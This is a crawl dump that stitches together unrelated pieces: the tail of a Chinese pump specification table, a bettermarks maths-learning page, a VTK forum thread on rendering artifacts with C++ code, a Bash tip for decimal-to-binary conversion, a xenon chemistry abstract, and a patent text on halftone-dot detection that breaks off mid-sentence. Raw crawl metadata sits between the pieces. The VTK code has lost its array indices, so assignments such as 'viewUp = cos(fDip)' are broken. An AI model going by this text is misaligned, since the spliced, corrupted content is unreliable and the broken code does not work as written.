PS2=0.42 52 4 ZW(L)-1-X-13 0.22 XQG1000×0.6 0.76 300 329 25LG3-10×4 N=1.5kw P1=0.22 PS1=0.35 P1=0.32 PS2=0.40 97 5 ZW(L)-1-XZ-10 0.16 XQG1000×0.6 0.65 450 480 25LG3-10×4 N=1.5kw P1=0.16 PS1=0.33 P1=0.30 PS2=0.38 86 6 ZW(L)-Ⅰ-XZ-13 0.22 XQG1000×0.6 0.67 450 452 25LG3-10×5 N=1.5kw P1=0.22 PS1=0.41 P1=0.38 PS2=0.46 80 7 ZW(L)-Ⅱ-Z- A 0.22 -0.38 XQG800×0.6 0.80 150 159 25LG3-10×6 N=2.2kw P1=0.38 PS1=0.53 P1=0.50 PS2=0.60 61 8 B 0.38 -0.50 XQG800×1.0 0.80 150 159 25LG3-10×8 N=2.2kw P1=0.50 PS1=0.68 P1=0.65 PS2=0.75 51 9 C 0.50 -0.65 XQG1000×1.0 0.85 150 206 25LG3-10×9 N=2.2kw P1=0.65 PS1=0.81 P1=0.78 PS2=0.86 59 10 D 0.65 -0.85 XQG1000×1.6 0.85 150 206 25LG3-10×11 N=3.0kw P1=0.85 PS1=1.04 P1=1.02 PS2=1.10 57 11 E 0.85 -1.0 XQG1000×1.6 0.85 150 206 25LG3-10×13 N=4.0kw P1=1.00 PS1=1.21 P1=1.19 PS2=1.27 50 12 ZW(L)-Ⅱ-X- A 0.22-0.38 XQG800×0.6 0.78 300 302 25LG3-10×6 N=2.2kw P1=0.38 PS1=0.53 P1=0.50 PS2=0.60 72 13 B 0.38-0.50 XQG800×1.0 0.78 300 302 25LGW3-10×8 N=2.2kw P1=0.50 PS1=0.68 P1=0.65 PS2=0.75 61 14 C 0.50-0.65 XQG1000×1.0 0.78 300 302 25LG3-10×10 N=3.0kw P1=0.65 PS1=0.88 P1=0.86 PS2=0.93 51 15 D 0.65-0.85 XQG1200×1.6 0.85 300 355 25LG3-10×13 N=4.0kw P1=0.85 PS1=1.05 P1=1.02 PS2=1.10 82 16 E 0.85-1.0 XQG1200×1.6 0.85 300 355 25LG3-10×15 N=4.0kw P1=1.00 PS1=1.21 P1=1.19 PS2=1.26 73 17 ZW(L)-Ⅱ-XZ- A 0.22-0.38 XQG1200×0.6 0.80 450 474 25LG3-10×6 N=2.2kw P1=0.38 PS1=0.53 P1=0.50 PS2=0.60 133 18 B 0.38-0.50 XQG1200×1.0 0.80 450 474 25LG3-10×8 N=2.2kw P1=0.50 PS1=0.68 P1=0.65 PS2=0.75 110 19 C 0.50-0.65 XQG1200×1.0 0.80 450 474 25LG3-10×10 N=3.0kw P1=0.65 PS1=0.81 P1=0.78 PS2=0.86 90 20 D 0.65-0.85 XQG1200×1.6 0.80 450 474 25LG3-10×12 N=4.0kw P1=0.85 PS1=1.04 P1=1.02 PS2=1.10 73 21 E 0.85-1.0 XQG1200×1.6 0.80 450 474 25LG3-10×14 N=4.0kw P1=1.00 PS1=1.21 P1=1.19 PS2=1.27 64\n\n### 购买/咨询\n\n * 联系人: 请填写您的真实姓名 * 手机号码: 请填写您的真实手机 E-mail: 联系地址: 其他说明: 类型: 咨询 购买 * 验证码:", null, "看不清?\n\n### 评论信息\n\n##### 发表评论\n 姓名: 内容: 
" ]
[ null, "http://www.xzqpv.com/App/Tpl/Public/Images/close.png", null, "http://www.xzqpv.com/Public/Uploads/Products/20190511/5cd66d9fb9756.jpg", null, "http://www.xzqpv.com/App/Tpl/Public/Images/jqs-left.gif", null, "http://www.xzqpv.com/App/Tpl/Public/Images/jqs-right.gif", null, "http://www.xzqpv.com/Public/Uploads/image/20170804/5983e0c319c58.jpg", null, "http://www.xzqpv.com/Public/Uploads/image/20190511/5cd66e192746d.jpg", null, "http://www.xzqpv.com/Public/Uploads/image/20190511/5cd66e212ebf3.jpg", null, "http://www.xzqpv.com/Public/Uploads/image/20190511/5cd66e279ebc9.jpg", null, "http://www.xzqpv.com/products/verify/", null, "http://www.xzqpv.com/public/verify.html", null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.9402896,"math_prob":0.99261373,"size":1108,"snap":"2019-51-2020-05","text_gpt3_token_len":1244,"char_repetition_ratio":0.02807971,"word_repetition_ratio":0.0,"special_character_ratio":0.18140794,"punctuation_ratio":0.053030305,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9774014,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20],"im_url_duplicate_count":[null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-12T12:02:15Z\",\"WARC-Record-ID\":\"<urn:uuid:3895d1ae-e1e5-4b35-86d9-855f4e82205c>\",\"Content-Length\":\"69020\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:1cf60b73-84e2-44d4-b8e8-2448692ce1ba>\",\"WARC-Concurrent-To\":\"<urn:uuid:4473b4d9-e69e-40d9-9801-4ac20d72bc1b>\",\"WARC-IP-Address\":\"124.172.155.122\",\"WARC-Target-URI\":\"http://www.xzqpv.com/products/2034.html\",\"WARC-Payload-Digest\":\"sha1:JLS5XMXDADLVUGP4X3OJWY3CRQ27SUBF\",\"WARC-Block-Digest\":\"sha1:E2M65LT4AV2OTXLXYOULLMS3TNQGEPJJ\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575540543252.46_warc_CC-MAIN-20191212102302-20191212130302-00334.warc.gz\"}"}
https://bettermarks.com/how-it-works/
[ "# How it works\n\n## Feedback with every mistake\n\nThere are no dead ends with bettermarks. Right from the start, every learning type can find an exercise to fit. Start off with guided exercises, then work step by step through series and topics that get progressively more difficult. The student is never simply left alone – diverse forms of help are just a click away, before, during and after any particular question. If the student still has problems in an area, bettermarks automatically recommends exercises to close the knowledge gaps it identifies. This gives every student the opportunity to learn at their own pace.\n\n## Built for teachers\n\nOur goal is to facilitate the learning and teaching of mathematics. To reach this goal, bettermarks employs teachers, mathematicians, academic educationalists and software specialists to work together. Our adaptive math books guide students through exercises step by step with constructive feedback. As a teacher, you receive comprehensive reports on all your students‘ activity.", null, "### Teach\n\nIntroduce the topic in the lesson as you usually would.\n\n### Assign\n\nGive bettermarks exercises to your students.\n\n### Work\n\nThe students work through the exercises.\n\n### Evaluate\n\nGet the results with the click of a button.\n\nRepeat material or move on.\n\n# Topics for grades 4 to 10\n\nFractions\n• Basics of Fractions\n• Preparation for Calculating with Fractions\n• Addition and Subtraction of Fractions\n• Multiplication and Division of Fractions\n• Rules of Operation: Fractions\nData and Probability\n• Collecting, Representing and Analysing Data\n• Probability – Basics\n• Descriptive Statistics\nDecimal numbers\n• Decimal Numbers – Basics\n• Decimal Numbers – Further\n• Addition and Subtraction of Decimal Numbers\n• Multiplication and Division of Decimal Numbers\n• Mensuration\n• Written Addition and Subtraction of Decimal Numbers\n• Long Multiplication and Division of Decimal Numbers\n• Application of Decimal Numbers\nFunctions and their Representations\n• Functions – Basics\n• Linear Functions\n• Rational Functions\n• Linear and Exponential Growth\n• Exponential Functions\n• Logarithms\n• Power Functions\nGeometry\n• Maps, Scale, Symmetry, Key Terms on Geometry\n• Angles, Basic Constructions and Symmetry\n• Triangles\n• Rectangles, Squares and Composite Shapes\n• Cuboids, Cubes and Composite Solids\n• Circles\n• Prisms and Cylinders\n• Pyramids, Cones, Composite and Hollow Solids\n• Spheres\n• Enlargement and Reduction, Similarity\n• Intercept Theorems\n• Pythagoras‘ Theorem\nDecimal numbers\n• Converting, Comparing, Ordering and Calculating Currency\n• Converting, Comparing, Ordering and Calculating Length\n• Converting, Comparing, Ordering and Calculating Weight\n• Converting, Comparing, Ordering and Calculating Time\n• Word Problems on Currency, Length, Weight and Time\nLinear Equations and Inequalities\n• Setting up, Solving and Applying Linear Equations\n• Identifying, Solving and Applying Inequalities\n• Introduction to Systems of Linear Equations\nNatural Numbers\n• Introduction to Natural Numbers and Calculations\n• Representing Numbers up to 10 000\n• Comparing and Arranging Numbers up to 10 000\n• Addition and Subtraction up to 10 000\n• Representing Numbers up to 1 000 000\n• Comparing, Arranging and Rounding Numbers up to 1 000 000\n• Addition and Subtraction up to 1 000 000\n• Mental Multiplication and Division of Large Numbers\n• Large Numbers, Rounding and Estimation\n• Adding and Subtracting Natural Numbers\n• 
Multiplying and Dividing Natural Numbers\n• Order of Operations\n• Written Methods of Addition, Subtraction, Multiplication and Division\n• Square Numbers and Powers\nDivisibility and Prime Numbers\n• Divisibility Rules\n• Prime Numbers and Prime Factorisation\n• Sets of Factors and Multiples, HCF, LCM, Brain-Teasers\nTrigonometry\n• Calculations on Right-Angled Triangles\n• Calculations on General Triangles\n• Trigonometric functions and their graphs\nExpressions and Powers\n• Setting up and Evaluating Algebraic Expressions and Using Tables of Values\n• Calculating with Terms and Simplifying Expressions\n• Calculating with Terms and Powers\n• Powers with Natural Exponents\n• Powers with Integer Exponents\n• Powers with Rational Exponents\nProportion, Percentages and Interest\n• Direct Proportion and Inverse Proportion\n• Percentages and Interest Using the Rule of Three and Formulas", null, "bettermarks is an adaptive learning system for maths covering grades 4 to 10 (age 10 to 16)." ]
[ null, "https://bettermarks.com/wp-content/uploads/2019/05/howitworks.png", null, "https://bettermarks.com/wp-content/uploads/2019/05/bettermarks-logo.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9528302,"math_prob":0.8820297,"size":953,"snap":"2019-51-2020-05","text_gpt3_token_len":173,"char_repetition_ratio":0.10748156,"word_repetition_ratio":0.0,"special_character_ratio":0.17628542,"punctuation_ratio":0.11445783,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9940019,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,5,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-09T01:57:35Z\",\"WARC-Record-ID\":\"<urn:uuid:c1493328-3cad-4e33-b3b1-b966bf7d3bbd>\",\"Content-Length\":\"35076\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:678f0866-288d-4af4-a1eb-e26734bfd020>\",\"WARC-Concurrent-To\":\"<urn:uuid:f0784333-925d-46e7-bd63-0ca537cd8594>\",\"WARC-IP-Address\":\"159.69.52.46\",\"WARC-Target-URI\":\"https://bettermarks.com/how-it-works/\",\"WARC-Payload-Digest\":\"sha1:EU45YXSIFK65UYNEELBVTT7HIHH7Z3NV\",\"WARC-Block-Digest\":\"sha1:3QXGWYG3EEF2OX6QU2JDHSZPTBRPE7CY\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575540517156.63_warc_CC-MAIN-20191209013904-20191209041904-00156.warc.gz\"}"}
https://discourse.vtk.org/t/surface-rendering-artifacts/8875
[ "# surface rendering artifacts\n\nI am working on transitioning legacy VTK code (5.6) to 9.1+ and am encountering rendering\nartifacts when visualizing a triangulated, mostly flat, 3D surface. The artifact does not occur with\nour legacy code but does with builds against VTK tags v9.1.0 and v9.2.0.rc1.\nA very basic pipeline with mostly defaults (ie., lighting etc.) but with customize camera parameters\nproduces the artifact shown below. C++ code is provided. Any suggestions on mitigating or eliminating\nthis artifact ?\n\nA close up view of a corner of the planar surface:\n\nOverview of the planar surface in wireframe:\n\nSource:\n\n``````// plane_artifact_vtk.cpp : A demonstration of polydata rendering artifact not present\n// in vtk 5.6 (post introduction of shader support in vtk)\n//\n\n#include <vtkActor.h>\n#include <vtkCamera.h>\n#include <vtkNew.h>\n#include <vtkPolyDataMapper.h>\n#include <vtkProperty.h>\n#include <vtkRenderWindow.h>\n#include <vtkRenderer.h>\n#include <vtkRenderWindowInteractor.h>\n#include <vtkInteractorStyleTrackballCamera.h>\n\nusing namespace std;\n\nint main(int argc, char* argv[])\n{\nif (2 != argc)\n{\nstd::cout << \"Usage: plane_artifact_vtk <filename.vtp>\" << std::endl;\nreturn EXIT_SUCCESS;\n}\nstd::string filename(argv);\n\nvtkNew<vtkRenderer> renderer;\nvtkNew<vtkCamera> camera;\n\nrenderer->SetActiveCamera(camera);\nrenderer->SetBackground(1, 1, 1);\n\nvtkNew<vtkRenderWindow> renderWindow;\nrenderWindow->SetSize(800, 800);\nrenderWindow->SetWindowName(\"Plane Artifact VTK\");\n\nvtkNew<vtkRenderWindowInteractor> interactor;\ninteractor->SetRenderWindow(renderWindow);\n\nvtkNew<vtkInteractorStyleTrackballCamera> style;\ninteractor->SetInteractorStyle(style);\n\nvtkNew<vtkPolyDataMapper> mapper;\n\nvtkNew<vtkActor> actor;\nactor->SetMapper(mapper);\n\ndouble m_fAzimuth = 535;\ndouble m_fDip = 271;\nbool m_bParallelProjection = true;\n\ndouble m_fEast_Offset = -2076927.0490000001;\ndouble m_fNorth_Offset = -14599585.767999999;\ndouble m_fDepth_Offset = -6113.5580000000000;\ndouble m_fDistance = 40003208.092430003;\ndouble m_fZoomFactor = 6499379.5999999996;\nint m_nZCoordScale = 1;\n\n// set view up and direction of projection based on document settings\ndouble fAzim = m_fAzimuth / 720.0 * vtkMath::Pi();\ndouble fDip = m_fDip / 720.0 * vtkMath::Pi();\ndouble viewUp;\n\nviewUp = cos(fDip);\nviewUp = sin(fDip) * sin(fAzim);\nviewUp = sin(fDip) * cos(fAzim);\n\ndouble focalPoint;\n// set focal point according to offsets\nfocalPoint = -m_fEast_Offset;;\nfocalPoint = -m_fNorth_Offset;\nfocalPoint = m_fDepth_Offset * m_nZCoordScale;\n\ndouble directionOfProjection;\ndirectionOfProjection = -sin(fDip);\ndirectionOfProjection = cos(fDip) * sin(fAzim);\ndirectionOfProjection = cos(fDip) * cos(fAzim);\n\ndouble position;\nposition = focalPoint - directionOfProjection * m_fDistance;\nposition = focalPoint - directionOfProjection * m_fDistance;\nposition = focalPoint - directionOfProjection * m_fDistance;\n\ndouble viewAngle = 180.0 / vtkMath::Pi() * 0.1 * 6400.0 / m_fZoomFactor;\ndouble m_fParallelScale = 325 * m_fDistance / m_fZoomFactor;\n\nstd::cout << \"parallel scale: \" << m_fParallelScale << std::endl;\nstd::cout << \" distance: \" << m_fDistance << std::endl;\nstd::cout << \" zoom factor: \" << m_fZoomFactor << std::endl;\nstd::cout << \" east offset: \" << m_fEast_Offset << std::endl;\nstd::cout << \" north offset: \" << m_fNorth_Offset << std::endl;\nstd::cout << \" depth offset: \" << m_fDepth_Offset << std::endl;\nstd::cout << \" azimuth: \" << 
m_fAzimuth << std::endl;\nstd::cout << \" dip: \" << m_fDip << std::endl;\n\ncamera->SetViewUp(viewUp);\ncamera->SetPosition(position);\ncamera->SetFocalPoint(focalPoint);\ncamera->SetViewAngle(viewAngle);\ncamera->SetParallelProjection(m_bParallelProjection);\ncamera->SetParallelScale(m_fParallelScale);\ncamera->SetClippingRange(m_fDistance / 5, m_fDistance * 5);\n\ninteractor->Start();\n\nreturn EXIT_SUCCESS;\n}\n\n``````\n\nI discovered by inserting vtkPolyDataNormals between reader and mapper the artifact is eliminated.\nAnother solution is to force the renderer to call ResetCamera() (eg., ‘r’ or 'R\" key press) which\nadjusts/resets the camera clipping range and parallel scale based on visible prop bounds. If\nanyone has some insight as to why the artifact occurs post vtk 5.6 please comment.\n\nhave you tried with `.GetProperty().SetInterpolationToFlat()`\n\nHi Marco,\n\nif I set the actor interpolation to flat, then my fix with poly data normals\nno longer works … so does not resolve the issue. So far, the only fix that works directly\nis polydata normals and indirectly regardless of interpolation mode is forcing reset camera clipping range." ]
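For anyone reproducing the workaround from Python instead of C++, a minimal pipeline with vtkPolyDataNormals inserted between the reader and the mapper looks roughly like the sketch below. It is an assumed, simplified setup (generic file name, default camera, no custom clipping range), not the original reproducer from this thread.

```python
import vtk

# Reader -> normals -> mapper: computing point normals up front avoids the
# shading artifact described in the post.
reader = vtk.vtkXMLPolyDataReader()
reader.SetFileName("surface.vtp")  # assumed input file name

normals = vtk.vtkPolyDataNormals()
normals.SetInputConnection(reader.GetOutputPort())

mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(normals.GetOutputPort())

actor = vtk.vtkActor()
actor.SetMapper(mapper)

renderer = vtk.vtkRenderer()
renderer.SetBackground(1, 1, 1)
renderer.AddActor(actor)
renderer.ResetCamera()  # mirrors the ResetCamera() workaround mentioned above

window = vtk.vtkRenderWindow()
window.AddRenderer(renderer)
window.SetSize(800, 800)

interactor = vtk.vtkRenderWindowInteractor()
interactor.SetRenderWindow(window)
window.Render()
interactor.Start()
```

In practice either the normals filter or the camera reset was enough to remove the artifact for the original poster.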
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.54079956,"math_prob":0.7886462,"size":4072,"snap":"2022-27-2022-33","text_gpt3_token_len":1165,"char_repetition_ratio":0.13372664,"word_repetition_ratio":0.020361992,"special_character_ratio":0.29420432,"punctuation_ratio":0.26717559,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9506546,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-08-09T13:03:15Z\",\"WARC-Record-ID\":\"<urn:uuid:83e48abb-6308-4f6b-b7ea-6bbddfe4d0af>\",\"Content-Length\":\"26787\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:cf83c065-b66c-4754-bc88-7cec809fc3cf>\",\"WARC-Concurrent-To\":\"<urn:uuid:289eaa59-3603-462b-9ba7-66dfe7182e84>\",\"WARC-IP-Address\":\"50.58.123.179\",\"WARC-Target-URI\":\"https://discourse.vtk.org/t/surface-rendering-artifacts/8875\",\"WARC-Payload-Digest\":\"sha1:4HIZFB2ZYS5TJDVR4A3FSPOPOOZ6KM5L\",\"WARC-Block-Digest\":\"sha1:KEAK7GLEBDVYTGUB7ONPLBW2IIV67OKD\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-33/CC-MAIN-2022-33_segments_1659882570977.50_warc_CC-MAIN-20220809124724-20220809154724-00297.warc.gz\"}"}
https://en.quoll.it/faq/convert-a-decimal-number-to-binary-from-bash/
[ "# Convert a decimal number to binary from Bash\n\nSuppose we are working on a Bash script and, for some realistic need, we have to convert a decimal number or variable into a binary number.\n\nThere are of course several solutions, but the one I propose does not make use of external programs: it is pure Bash.\n\nFirst we need to know the maximum value of the binary number to be obtained, or in how many bits it has to fit.\n\nAssuming we are talking about a byte, and therefore 8 bits, its binary range will go from 00000000 to 11111111 (from 0 to 255), so we can write:\n\n``````bin=({0..1}{0..1}{0..1}{0..1}{0..1}{0..1}{0..1}{0..1})\necho \\${bin[*]}``````\n\nMost of the work is already done: to get the binary form of, for example, 125 or 78, it is enough to write\n\n``````echo \\${bin[125]}\n01111101\necho \\${bin[78]}\n01001110``````\n\nIf the range of the binary number changes, for example if we double or quadruple it, it is enough to define the bin variable with one or two more blocks of the type {0..1}.\n\nSo, summing up, the bin variable will have to contain as many blocks {0..1} as required by the maximum binary number to be obtained; that is, if the maximum number is 2^n - 1 then it will take n groups {0..1}.\n\nAs an example, if n=10 and therefore 2^10 - 1 = 1023, the blocks will be 10:\n\n``````bin=({0..1}{0..1}{0..1}{0..1}{0..1}{0..1}{0..1}{0..1}{0..1}{0..1})\necho \\${bin[1023]}\n1111111111``````" ]
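A quick way to convince yourself that the n-th element of this brace expansion really is n written in binary is the small check below. It is only a verification sketch (in Python, since the point of the post is to stay in pure Bash), and the bit width of 8 is just the byte example from the text.

```python
from itertools import product

# Bash expands {0..1}{0..1}... with the leftmost group varying slowest,
# which is exactly ascending binary order; itertools.product does the same.
bits = 8
table = ["".join(p) for p in product("01", repeat=bits)]

assert table[125] == format(125, "08b")  # '01111101'
assert table[78] == format(78, "08b")    # '01001110'
print(table[125], table[78])
```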
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.91591734,"math_prob":0.99339575,"size":1363,"snap":"2023-40-2023-50","text_gpt3_token_len":394,"char_repetition_ratio":0.17880794,"word_repetition_ratio":0.0,"special_character_ratio":0.35730007,"punctuation_ratio":0.16470589,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99298066,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-10-02T15:48:21Z\",\"WARC-Record-ID\":\"<urn:uuid:4e9c16f3-8cbd-463c-aabc-50fec596a340>\",\"Content-Length\":\"152307\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f9002bc4-0e42-4eab-b4d1-6877bb0e8eb6>\",\"WARC-Concurrent-To\":\"<urn:uuid:4b837024-02a3-41f1-bc81-b6a6818769ec>\",\"WARC-IP-Address\":\"16.171.100.43\",\"WARC-Target-URI\":\"https://en.quoll.it/faq/convert-a-decimal-number-to-binary-from-bash/\",\"WARC-Payload-Digest\":\"sha1:5HV6EX2BJ3KWBZVUQG2F3JF4SNTAMGQY\",\"WARC-Block-Digest\":\"sha1:FO7AXGRJA3TW3LUSTJIMAL372DIDSAU5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233511000.99_warc_CC-MAIN-20231002132844-20231002162844-00323.warc.gz\"}"}
https://experts.mcmaster.ca/display/publication1476586
[ "# Synthesis, Structural Characterization, and Computational Study of the Strong Oxidant Salt [XeOTeF5][Sb(OTeF5)6]·SO2ClF† Conference Paper", null, "### abstract\n\n• The strong oxidant salt [XeOTeF(5)][Sb(OTeF(5))(6)].SO(2)ClF has been synthesized by reaction of stoichiometric amounts of Xe(OTeF(5))(2) and Sb(OTeF(5))(3) in SO(2)ClF solution at -78 degrees C and characterized in SO(2)ClF solution by low-temperature (17)O, (19)F, (121)Sb, (125)Te, and (129)Xe NMR spectroscopy, showing the Xe...O donor-acceptor bond XeOTeF(5)(+).SO(2)ClF adduct-cation to be labile at temperatures as low as -80 degrees C. The salt crystallizes from SO(2)ClF as [XeOTeF(5)][Sb(OTeF(5))(6)].SO(2)ClF, and the low-temperature crystal structure was obtained: triclinic, P-1, a = 9.7665(5) Å, b = 9.9799(4) Å, c = 18.5088(7) Å, alpha = 89.293(2) degrees, beta = 82.726(2) degrees, gamma = 87.433(3) degrees, V = 1787.67(13) Å(3), Z = 2, and R(1) = 0.0451 at -173 degrees C. Unlike MF(6)(-) in [XeF][MF(6)] (e.g., M = As, Sb, Bi) and [XeOTeF(5)][AsF(6)], the Sb(OTeF(5))(6)(-) anion is significantly less basic and does not interact with the coordinately unsaturated xenon(II) cation. Rather, the XeOTeF(5)(+) cation and weak Lewis base, SO(2)ClF, interact by coordination of an oxygen atom of SO(2)ClF to xenon [Xe...O, 2.471(5) Å]. The XeOTeF(5)(+).SO(2)ClF adduct-cation has also been studied by low-temperature Raman spectroscopy, providing frequencies that have been assigned to adducted SO(2)ClF. The solid-state Raman spectra of XeOTeF(5)(+).SO(2)ClF and Sb(OTeF(5))(6)(-) have been assigned with the aid of electronic structure calculations. In addition to optimized geometries and vibrational frequencies, theoretical data, including gas-phase donor-acceptor bond energies, natural bond orbital (NBO) analyses, and topological analyses based on electron localization functions (ELF), provide descriptions of the bonding in XeOTeF(5)(+).SO(2)ClF and related systems. The quantum mechanical calculations provided consistent trends for the relative strengths of the Xe...O donor-acceptor bond in XeOTeF(5)(+).SO(2)ClF and ion-pair bonds in [XeL][MF(6)] (L = F, OTeF(5); M = As, Sb), with the Xe...O bond of XeOTeF(5)(+).SO(2)ClF being the weakest in the series.\n\n### authors\n\n• Mercier, Hélène PA\n• Moran, Matthew D\n• Sanders, Jeremy CP\n• Schrobilgen, Gary\n• Suontamo, RJ\n\n• January 2005" ]
[ null, "https://experts.mcmaster.ca/images/individual/uriIcon.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.82565445,"math_prob":0.9838958,"size":2303,"snap":"2019-35-2019-39","text_gpt3_token_len":806,"char_repetition_ratio":0.14876033,"word_repetition_ratio":0.0,"special_character_ratio":0.31741208,"punctuation_ratio":0.15618661,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95490897,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-09-19T18:44:03Z\",\"WARC-Record-ID\":\"<urn:uuid:f24e6d77-ee78-4ee6-b299-b1f98b67e4e8>\",\"Content-Length\":\"26100\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:170fa50a-415f-4b86-8e84-25bd7f16f834>\",\"WARC-Concurrent-To\":\"<urn:uuid:985ab49b-ba92-4428-add1-623104bffce5>\",\"WARC-IP-Address\":\"130.113.213.148\",\"WARC-Target-URI\":\"https://experts.mcmaster.ca/display/publication1476586\",\"WARC-Payload-Digest\":\"sha1:U5Y45OMRQTYUPQRL5SW3MGGRY4GCJWQD\",\"WARC-Block-Digest\":\"sha1:5HGHWABFSV3PAWIJWU4CLILDQZCEFPZD\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-39/CC-MAIN-2019-39_segments_1568514573570.6_warc_CC-MAIN-20190919183843-20190919205843-00514.warc.gz\"}"}
https://patents.justia.com/patent/8988732
[ "# Image processing apparatus and image processing method\n\nIn the image processing apparatus, image data is divided into large blocks of a prescribed size and the large blocks are subdivided into small blocks by the dividing unit. The number of isolated points in each large block is then calculated by the large block isolated point calculation unit, and the number of isolated points in each small block is then calculated by the small block isolated point calculation units. It is then determined by the halftone-dot region determination unit whether or not the large block is a halftone-dot region. This determination considers both the number of isolated points in the large block and the number of isolated points in each small block.\n\n## Latest Konica Minolta Business Technologies, Inc. Patents:\n\nDescription\nCROSS-REFERENCE TO RELATED APPLICATIONS\n\nThis application is based on application No. 2002-271511 filed in Japan, the contents of which are hereby incorporated by reference.\n\nBACKGROUND OF THE INVENTION\n\n1. Field of the Invention\n\nThe present invention relates to an image processing apparatus that performs image processing, and more particularly, to an image processing apparatus that distinguishes image attributes, particularly halftone-dot regions, and performs image processing appropriate for such attributes.\n\n2. Description of the Related Art\n\nIn the conventional art, when image processing apparatuses such as printers perform printing or other processing of halftone-dot regions, the phenomenon of moiré can occur. As a result, the occurrence of moiré has been prevented by extracting halftone-dot regions from the image data and carrying out smoothing regarding the extracted halftone-dot regions. As a process for extracting halftone-dot regions from image data, a process has been proposed wherein the image data is divided into blocks having a prescribed range and it is determined whether the characteristics of each block correspond to those of a halftone-dot region (Japanese Laid-Open Patent Application 2002-27242).\n\nHowever, the following problem exists in connection with the conventional image processing apparatus described above. Namely, the image data may include figures that are determined to be isolated points, depending on the character configuration. In particular, in the case of small-sized characters (particularly characters that are 5-point or smaller), areas bordered by lines can be detected as white isolated points. Furthermore, the dot in the letter ‘i’ or the small lines at the bottom in such characters as the Japanese character may be detected as black isolated points. In addition, a dot formed by the intersection of lines may also be detected as a black isolated point. A region in which these characters are concentrated may be incorrectly determined to be a halftone-dot region even if it is not. Furthermore, because smoothing is carried out to such erroneously determined regions, the sharpness of the characters contained therein may deteriorate.\n\nSpecifically, in a halftone-dot region in which isolated points are distributed evenly as shown in FIG. 7, 12 isolated points are extracted from the block shown in FIG. 7. On the other hand, in a character region, three of the characters in a small point size may be concentrated in a single block, as shown in FIG. 8. In this situation, four white isolated points are extracted for each character . 
Consequently, from this character region, a total of 12 isolated points are extracted from the three characters. As a result, when the determination of whether or not a halftone-dot region exists is based on the number of isolated points, because the block in FIG. 8 contains the same number of isolated points as the halftone-dot region in FIG. 7, it is erroneously determined to be a halftone-dot region even though it is in fact a character region.\n\nOBJECTS AND SUMMARY\n\nThe present invention was created in order to resolve the problem with the technology of the prior art identified above. In other words, an object of the present invention is to provide an image processing apparatus that minimizes deterioration in output image quality by appropriately distinguishing the attributes of image areas, particularly halftone-dot regions, and performing processing properly suited to such areas.\n\nThe image processing apparatus constituting a first aspect of the present invention is an image processing apparatus that handles image data, comprising: a dividing unit which divides image data into large blocks of a prescribed size and further subdivides these large blocks into multiple smaller blocks; a large block isolated point calculation unit which calculates the number of isolated points contained in each large block established by the dividing unit; a small block isolated point calculation unit which calculates the number of isolated points contained in each small block established by the dividing unit; and a halftone-dot region determination unit which determines whether or not a large block is a halftone-dot region based on the number of isolated points calculated by the large block isolated point calculation unit and the number of the isolated points calculated by the small block isolated point calculation unit.\n\nIn this image processing apparatus, the large blocks are subdivided by the dividing unit into small blocks. The number of isolated points in each large block is then calculated by the large block isolated point calculation unit, and the number of isolated points in each small block is then calculated by the small block isolated point calculation unit. It is then determined by the halftone-dot region determination unit whether or not the large block is a halftone-dot region. This determination considers both the number of isolated points in the large block and the number of isolated points in each small block. In other words, for a large block to be determined a halftone-dot region, not only must the number of isolated points in the large block satisfy the condition for determination as a halftone-dot region, but the number of isolated points in each small block must also satisfy the condition for a halftone-dot region. 
This allows region attributes to be distinguished in more detail and reduces the risk of an erroneous region attribute determination.\n\nThe image processing apparatus of a second aspect of the present invention is an image processing apparatus that handles image data, comprising: a dividing unit which divides image data into multiple small blocks; a small block isolated point calculation unit which calculates the number of isolated points contained in each small block established by the dividing unit; a large block isolated point calculation unit which calculates the number of isolated points contained in a large block composed of multiple smaller blocks based on the small block isolated point totals calculated by the small block isolated point calculation unit; and a halftone-dot region determination unit which determines whether or not a large block is a halftone-dot region based on the number of isolated points calculated by the large block isolated point calculation unit and the number of isolated points calculated by the small block isolated point calculation 